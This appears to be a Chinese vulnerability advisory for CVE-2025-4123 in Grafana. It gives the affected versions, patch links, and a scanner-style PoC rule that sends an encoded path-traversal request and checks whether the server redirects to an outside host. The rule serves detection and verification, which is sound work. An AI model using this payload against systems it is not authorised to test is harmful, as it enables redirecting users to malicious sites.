漏洞描述
该漏洞允许攻击者通过自定义前端插件将用户重定向到恶意网站,并执行任意 JаvаSсriрt 代码。
CVE-2025-4123: Grafana开放重定向&服务端请求伪造漏洞
PoC代码[已公开]
id: CVE-2025-4123
info:
name: Grafana开放重定向&服务端请求伪造漏洞
author: free2e
severity: high
verified: true
description: |
该漏洞允许攻击者通过自定义前端插件将用户重定向到恶意网站,并执行任意 JаvаSсriрt 代码。
affected: 8.0.0 ≤ grafana <10.4.18 、11.2.0 ≤ grafana <11.2.9 、11.3.0 ≤ grafana <11.3.6、 11.4.0 ≤ grafana <11.4.4 、11.5.0 ≤ grafana <11.5.4 、11.6.0 ≤ grafana <11.6.1 、 12.0.0 ≤ grafana <12.0.1
solutions: 目前厂商已发布升级补丁以修复漏洞https://grafana.com/security/security-advisories/cve-2025-4123/、https://grafana.com/blog/2025/05/21/grafana-security-release-high-severity-security-fix-for-cve-2025-4123/
reference:
- https://mp.weixin.qq.com/s/URckOUcTYvZR4rh9MS9T_w
tags: Grafana、CVE-2025-4123
rules:
r0:
request:
method: GET
path: /public/..%2F%5ddfaggust.pro%2F%3f%2F..%2F..
expression: |
response.status == 302 &&
response.headers["location"].contains("dfaggust.pro") &&
response.body.bcontains(b'<a href="/]dfaggust.pro/?/../../">Found</a>.')
expression: r0()